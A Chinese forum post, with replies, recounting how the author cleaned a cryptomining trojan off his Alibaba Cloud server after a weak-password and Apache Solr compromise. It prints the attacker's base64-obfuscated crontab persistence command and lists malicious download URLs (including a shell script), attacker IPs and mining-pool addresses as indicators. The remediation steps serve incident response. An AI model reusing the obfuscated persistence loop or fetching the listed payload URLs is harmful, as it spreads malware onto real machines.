网站 › 『病毒救援区』 › 个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施

shaun.sheng 发表于 2020-4-9 11:50

个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施

本帖最后由 shaun.sheng 于 2020-4-9 14:22 编辑

原文链接：https://blog.csdn.net/chinassj/article/details/105392445
以前玩过腾讯，阿里，华为的免费服务器，都是又卡又慢，身为22世纪祖国的花朵，经过知识付费的熏陶，我义无反顾的终止了我的白嫖行为，然而努力让自己变得更好的路上总是有各种坑。。。。
服务器背景：
https://img-blog.csdnimg.cn/20200408175301509.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​
操作环境背景：
操作系统：Windows 10
操作工具：xshell（Free for Home/school）
故事背景：
拿到服务器后，自己创建了一个普通用户：shaun ；密码：123456   
（我承认我懒，所以设了这个连号密码，但这个该死的挖矿程序把我心态搞炸了，他要是不搞我的程序，让我还能玩，我都懒得搞他，但是我搭建的程序都GG了，所以不得不花费一天时间来记录一下，菜鸡的垂死挣扎全过程）
一个多月都是用普通用户在瞎捣鼓，有一天习惯的ssh登录，然而不幸的事情发生了，一直登陆不上。（后来证明还有Apache Solr Velocity模板远程命令执行漏洞）（感谢大佬 @officektv 的纠错）

（当时没截图，以下图片都是后来的）
https://img-blog.csdnimg.cn/20200408180801719.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​解决方法：
根据菜鸡生存手册第一条：百度一下，你就知道。
https://img-blog.csdnimg.cn/20200408182240973.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​
虽然没解决但是提供了点思路，使用root成功登陆服务器，
发现些许猫腻
https://imgconvert.csdnimg.cn/aHR0cHM6Ly93b3Jrb3JkZXIuY29uc29sZS5hbGl5dW4uY29tL2F0dGFjaC9ub3RlX2F0dGFjaC5kbw?x-oss-process=image/format,pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​https://img-blog.csdnimg.cn/20200408182940814.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​

甜蜜的！这台服务器上什么都没有运行，跑这些干啥玩意捏，经过简单的kill 命令，发现杀不完。
https://img-blog.csdnimg.cn/20200408183509215.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​
看了一下定时任务果然：（当时没截图，以下图片都是后来的）
https://img-blog.csdnimg.cn/20200409100843117.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​

定时任务的脚本：
/bin/sh -c echo -n "KCB3aGlsZSA6IDsgZG8gc2xlZXAgNSA7IGlmICEga2lsbCAtMCA5MjI2ID4vZGV2L251bGwgMj4mMSA7IHRoZW4gL2hvbWUvc2hhdW4vYnZ4Y3Z3ID4vZGV2L251bGwgMj4mMSA7IGZpIDsgZG9uZSApICYgcGlkPSQhIDsgKHNsZWVwIDEwICYmIGtpbGwgLTkgJHBpZCkgJg==" | base64 -d | sh >/dev/null 2>&1data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==
https://img-blog.csdnimg.cn/20200409101027299.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​

while 循环！这是每一个小时不留痕迹的循环搞事情呀。。。

此时已经知道中了挖矿木马病毒，甜蜜的，这种级别的已经不是我这种菜鸡可以解决的了，登录阿里云官网看了一下，
https://img-blog.csdnimg.cn/20200409101447359.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​

https://img-blog.csdnimg.cn/20200408184526683.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​
因为穷所以没有快照，有钱的小伙伴一定要搞个快照，但是也要小心，别把病毒也快照进去了。
最偷懒的解决发法：重装系统(想要根除病毒太难了，初始化一下就完事了)，无非就是数据的问题，不怕直接重装；
阿里云官方教程：https://help.aliyun.com/document_detail/25449.html
初始化30分钟都不到；重新安装java，mysql，应用程序，恢复数据等，最重要的是重新设置了超复杂密码，以上问题解决一共花费清明节三天时间，反正受疫情影响，也出不去，只能这样安慰自己。

shaun：挖矿木马程序，你没想到吧，解决你只要几分钟，格式化一下就好了
https://img-blog.csdnimg.cn/20200408185433132.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​

以上全部内容，此致敬礼! （大佬们看到这里就可以了，这也是官方推荐的解决方法，下面的是菜鸡的左右互搏苦苦挣扎。）



再一天后，又是习惯的ssh登录，还是原来的配方，还是熟悉的味道，加夕。。。。（跑题了）
https://img-blog.csdnimg.cn/20200408180801719.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​解决方法：
根据菜鸡生存手册第一条：百度一下，你京
https://img-blog.csdnimg.cn/2020040819010898.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​
挖矿木马：你没想到吧，我又回来了！
shaun：我去年买了个表！
人生不如意，十有八九。本以为逃过一劫，
https://img-blog.csdnimg.cn/20200408190654665.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​
好吧，这辈子劳碌的命。。。
1.root登录
2.查看指定用户是否有定时任务：
crontab -l -u shaundata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==
3.删除此用户的定时任务：
crontab -r -ushaundata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==
4.查看此用户的定时任务文件：
cd /var/spool/cron/data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==
5.通过 ll找到 shaun的定时任务文件，直接 rm -rf shaun
6.因为神秘力量，所以会不停的创建shaun 的定时任务，你删了，过会又出来了。所以此时我们要走病毒的路，让他无路可走。    根据Linux下一切都是文件，一个目录归根到底还是一个文件，所以同一目录内文件和目录不能同名！
    个人操作：所以创建一个目录 名为shaun，让他没有办法创建名为shaun的定时任务文件。https://img-blog.csdnimg.cn/20200409102505623.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​
7.在次查看指定用户是否有定时任务：
crontab -l -u shaundata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==
8.在来一套七伤拳打发，检测cron定时服务是否自启用：
systemctl is-enabled crond.servicedata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw== 结果展示如下：
enable表示已启用自启动
disable标识未启用自启动
9.如果已经启用，关闭cron自启动:
systemctl disable crond.servicedata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

10.停止cron服务[命令没有提示]:
systemctl stop crond.servicedata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

11.查看cron服务的启动状态:
systemctl status crond.servicedata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==[只有cron的状态是activerunning的，才表示cron服务是启动的]
12.至此定时任务，应该停止了。可以查看一下有哪些正在运行的进程，kill掉不正常的就OK了。
ps -ef |grep shaundata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

13.修改 shaun 用户的登录密码
passwd shaundata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==

14.重新试了一下shaun 登录，可以登陆了。灰常开心，终于不要初始化了。

https://img-blog.csdnimg.cn/20200409105254512.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​

应该找售后解决问题，我不能抢人家饭碗呀。

https://img-blog.csdnimg.cn/20200409105423254.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​


总结：养成备份的好习惯，最好使用快照备份，就是注意别把病毒也备份进去。
          像我一样如果就是想玩玩，可以自己先和病毒玩玩，自认为技术过关，病毒查杀干干净净了，可以不用初始化。

                  如果和我一样是小白那最后还是初始化（格式化），此方法最麻烦的就是如何恢复数据了。

在此感谢这三个网站提供的思路：
https://img-blog.csdnimg.cn/20200409114310650.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​

https://www.w3xue.com/exp/article/20199/53730.html

https://zhuanlan.zhihu.com/p/85731835

https://www.cnblogs.com/hack404/p/11464890.html




Tips:要想生活过得去，所有检查都得绿。
https://img-blog.csdnimg.cn/20200409113747447.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​




1.贴出恶意下载源（我已经把这个ip，不论入站还是出站都拒绝访问了）

      （千万别点，会自动下载一个东东到你的电脑，我没研究）：http://82.146.36.205/sites/default/files/maps   
   https://img-blog.csdnimg.cn/20200409110823875.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​

2.贴出矿池IP：157.245.228.211 ；矿池端口：80

https://img-blog.csdnimg.cn/20200409111409366.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​


3.web攻击， Apache Solr Velocity模板远程命令执行漏洞（感谢大佬 @officektv 的纠错）
请求时间：2020-04-07 18:07:26
攻击者IP：194.99.104.130
https://img-blog.csdnimg.cn/20200409112411715.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2NoaW5hc3Nq,size_16,color_FFFFFF,t_70data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​
暂时修改建议：​ 限制互联网用户对solr admin的访问!​​​​​​​
​​https://img-blog.csdnimg.cn/20200409141801308.pngdata:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==​​
其他 恶意IP很多，不管是不是肉鸡，我是宁错杀不放过。
高危链接：本人在此声明，仅供学习参考，有任何问题，与本文，本人无关。
http://35.168.165.151/sites/default/files/maps

http://82.146.36.205/sites/default/files/maps

攻击者IP：194.99.104.130

矿池IP：157.245.228.211

矿池IP：157.245.149.66

中控IP：134.209.81.199

中控IP：157.245.149.66

攻击者IP：212.8.247.179

URL链接：http://217.12.221.244/s.sh


最后结束语：

引用毛主席的话：与天斗，与地斗，与人斗，其乐无穷！

shaun.sheng 发表于 2020-4-9 13:47

king82 发表于 2020-4-9 13:39
身为22世纪祖国的花朵，经过知识付费的熏陶，我义无反顾的终止了我的白嫖行为

看到这，忍不住笑出了声。 ...

哈哈哈，主要是腾讯阿里华为亚马逊，免费的一个月都玩完了，终于还是走上为国家贡献GDP的道路，向着共同富裕更近一步了。:lol

shaun.sheng 发表于 2020-4-9 13:17

寂静的白昼 发表于 2020-4-9 12:22
怎么查看是否被挖矿病毒入侵，因为服务器里没什么重要的东西所以我一般都是初始化

去每个平台的，服务器管理页面，一般都会有，危险提示报警。
或者直接Linux 里面 top 一下，就和任务管理器一样，可以看到cpu的

Bad丶Boy 发表于 2020-4-9 11:56

最后解决了没

shaun.sheng 发表于 2020-4-9 12:00

Bad丶Boy 发表于 2020-4-9 11:56
最后解决了没

解决了。只不过没有初始化。

孤丶宇 发表于 2020-4-9 12:05

感谢楼主！ 呜呜   (╯‵□′)╯︵❤

jswxyl 发表于 2020-4-9 12:06

楼主厉害了，威武

猪头是笨死的 发表于 2020-4-9 12:08

我认为木马里面找到别人的钱包地址，可以查出挂马人的信息，有的高级牛，能把别人钱包的钱黑了！😀

CNLibrary 发表于 2020-4-9 12:10

下面的图都看不到，而且原帖地址已经失效了

兔斯基的眼泪 发表于 2020-4-9 12:10

斗争的过程中自己的技术也见长了，美滋滋

谦月 发表于 2020-4-9 12:12

发现一个时间穿越者~

执念123 发表于 2020-4-9 12:16

阿里云整天提示我几十个漏洞

查看完整版本: 个人第一台阿里云付费服务器被挖矿木马攻陷的补救措施